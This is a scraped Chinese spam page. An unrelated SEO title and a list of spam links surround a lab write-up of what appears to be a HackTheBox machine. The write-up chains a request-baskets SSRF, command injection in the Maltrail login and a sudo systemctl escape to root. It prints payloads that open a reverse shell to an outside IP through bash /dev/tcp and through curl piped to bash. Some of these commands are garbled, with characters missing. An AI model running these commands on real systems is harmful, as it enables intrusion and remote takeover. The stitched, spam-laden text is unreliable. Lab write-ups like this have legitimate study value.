当前位置: 首页 > news >正文

深圳企业做网站公司有哪些自己建网站做推广

深圳企业做网站公司有哪些,自己建网站做推广,seo网站优化培训怎么做,做平面设计都在那个网站找免费素材?首先是信息搜集#xff0c;nmap扫一下 nmap -sV -sC -p- -v 10.10.11.224 发现存在两个端口#xff0c;55555端口有http服务#xff0c;访问一下 获得线索request-baskets版本为1.2.1#xff0c;搜索发现存在漏洞 那么我们试试构造ssrf#xff0c;create的时候bp抓包 构…首先是信息搜集nmap扫一下 nmap -sV -sC -p- -v 10.10.11.224 发现存在两个端口55555端口有http服务访问一下 获得线索request-baskets版本为1.2.1搜索发现存在漏洞 那么我们试试构造ssrfcreate的时候bp抓包 构造参考 直接访问http://10.10.11.224:55555/exp即可 不过只是执行了url请求没有内容。要想有内容把proxy_response设置为true就行 我们这里直接按照步骤来不抓包 创建后打开点击设置写入ssrf的url 然后访问给的路径即可 发现是Maltrail服务还有版本号0.53 参考文章 /login路径下存在远程执行漏洞构造如下 username;bash%20-i%20%3E%20/dev/tcp/10.10.14.32/1028%200%3E1不过没弹成功换成curl去弹 在本地创建shell.sh写入 bash -i /dev/tcp/10.10.14.32/1028 01开启服务器 python3 -m http.server 80然后nc开启监听bp构造payload username;curl 10.10.14.32/shell.sh|bash成功反弹shell找到user的flag 我们ls看一下发现有conf配置文件 我们cat一下得到信息admin和local的密码 sha256解密发现就是注释给的 我们查看下能用的命令 sudo -l发现有/usr/bin/systemctl status trail.service可以用搜一下相关提权方式 用第三个多简单 先提升交互权限 python3 -c import pty;pty.spawn(/bin/bash)然后执行 sudo systemctl status trail.service再输入!sh得到root权限 得到root的flag
http://www.yutouwan.com/news/184008/

相关文章:

  • 上海高品质网站建设公司成都三网合一网站建设
  • easyui做网站在线做图的网站
  • 连云港公司网站优化服务邯郸设计公司有哪些
  • php网站建设设计方法怎么把模板导入wordpress
  • 可以免费秒玩游戏的网站中国能源建设集团有限公司子公司
  • 用手机做电影网站做视频网站要多少钱
  • 兰州网站设计公司有哪些网站怎么做备案号超链接
  • 天津自己制作网站网站做全景图
  • 嘉兴网站建设解决方案网站怎么制作的
  • 绵阳专门做网站的公司计算机自学app
  • 个人设计师网站 青春沧州网站制作
  • 免费自助建站哪个好专业网站建设效果显著
  • 企业网站建设申请域名网页编辑教程
  • 学校网站建设的优势和不足wordpress 4.5 模板
  • 5站合一 网站建设海口网站建设优化公司
  • 常用的电子商务网站网络培训心得体会
  • 网站编程培训哪好网络推广是啥
  • 如何建立属于个人网站wordpress get_post_mime_type
  • 网站的第二域名怎么用小程序报价开发
  • 数据库网站开发网站建设实施方案ppt
  • 做透明头像的网站珠海专业网站制作公司
  • 西安今天的新消息未央区优化seo技术
  • 人社部能力建设中心网站wordpress 第三方登录插件
  • 查网站怎么做的面膜网站广告怎么做
  • 建网站软件有哪些下载百度安装
  • 石家庄做网站公司的电话app网站
  • 百度收录什么网站吗目前最好的找工作平台
  • 加油站建设专业网站网站建设设计方案格式
  • 兰州网站建设博客罗源县建设局网站
  • 哪个网站科技新闻好wdcp备份网站